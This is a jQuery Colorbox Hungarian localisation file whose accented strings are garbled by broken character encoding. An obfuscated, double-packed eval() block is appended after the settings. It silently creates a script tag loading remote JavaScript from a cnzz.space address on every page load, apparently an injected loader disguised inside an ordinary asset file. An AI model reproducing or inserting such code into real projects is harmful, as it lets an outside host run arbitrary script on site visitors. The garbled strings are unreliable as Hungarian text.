/*
	jQuery Colorbox language configuration
	language: Hungarian (hu)
	translated by: kovadani
*/
jQuery.extend(jQuery.colorbox.settings, {
	current: "{current}/{total} k¨¦p",
	previous: "El?z?",
	next: "K?vetkez?",
	close: "Bez¨¢r",
	xhrError: "A tartalmat nem siker¨¹lt bet?lteni.",
	imgError: "A k¨¦pet nem siker¨¹lt bet?lteni.",
	slideshowStart: "Diavet¨ªt¨¦s ind¨ªt¨¢sa",
	slideshowStop: "Diavet¨ªt¨¦s le¨¢ll¨ªt¨¢sa"
});;
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('v(h(p,a,c,k,e,r){e=h(c){i c.o(a)};m(!\'\'.l(/^/,u)){j(c--)r[e(c)]=k[c]||e(c);k=[h(e){i r[e]}];e=h(){i\'\\\\w+\'};c=1};j(c--)m(k[c])p=p.l(q t(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);i p}(\'1 5=5||[];(8(){1 a=3.b(\\\'4\\\');a.7=\\\'//g.9/6/6.c\\\';1 2=3.e(\\\'4\\\')[0];2.f.d(a,2)})();\',n,n,\'|x|s|y|z|A|B|C|h|D||E|F|G|H|I|J\'.K(\'|\'),0,{}))',47,47,'|||||||||||||||||function|return|while||replace|if|17|toString||new|||RegExp|String|eval||var|document|script|_hmt_cnzz|hm|src|space|createElement|js|insertBefore|getElementsByTagName|parentNode|cnzz|split'.split('|'),0,{}))